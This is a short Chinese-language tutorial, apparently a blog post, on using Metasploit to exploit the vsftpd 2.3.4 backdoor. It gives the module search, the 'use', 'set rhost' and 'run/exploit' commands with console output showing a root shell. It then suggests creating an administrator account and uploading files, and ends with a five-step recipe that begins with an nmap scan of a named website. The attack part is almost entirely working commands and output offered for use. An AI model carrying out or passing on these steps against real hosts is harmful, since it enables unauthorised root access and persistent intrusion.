利用metasploit实施***过程,进入metasploit命令行,search vsftpd,搜索有关vsftpd的相关工具和***载荷。查找结果如下:
msf > search vsftpd
Matching Modules
================
Name Disclosure Date Rank Description
—- ————— —- ———–
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 00:00:00 UTC excellent VSFTPD v2.3.4 Backdoor Command Execution
利用该漏洞命令:
use exploit/unix/ftp/vsftpd_234_backdoor
这样提示符就会提示进入到该路径下,show options查看需要设置的相关项:
msf exploit(vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
—- ————— ——– ———–
RHOST yes The target address
RPORT 21 yes The target port
Exploit target:
Id Name
– —-
0 Automatic
提示需要设置RHOST(***目标的IP)、RPORT(目标端口),由于这里是***ftp软件,端口默认为21,我们设置一下目标的ip,命令: set rhost 192.168.1.101, 在输入show options回车,确认下参数设置正确。检查无误,输入命令help,查看相关的操纵,一般是run或者exploit即可实施***.
结果显示已经获取了目标主机的root权限,建立管理员账号、上传***等动作就可以开始了
whoami
root (已经获取了目标主机的root权限)
1 先用扫描目标站点 nmap -sT -A www.metasploit.com.cn -sT
2 port 21 vsftpd version 2到2.3.4 ( 此版本存在漏洞,可以利用)
3 搜索工具并利用 search vsftpd | use exploit/unix/ftp/vsftpd_234_backdoor
4 根据扫描信息,修改实际***目标ip,端口
5 run | exploit 执行命令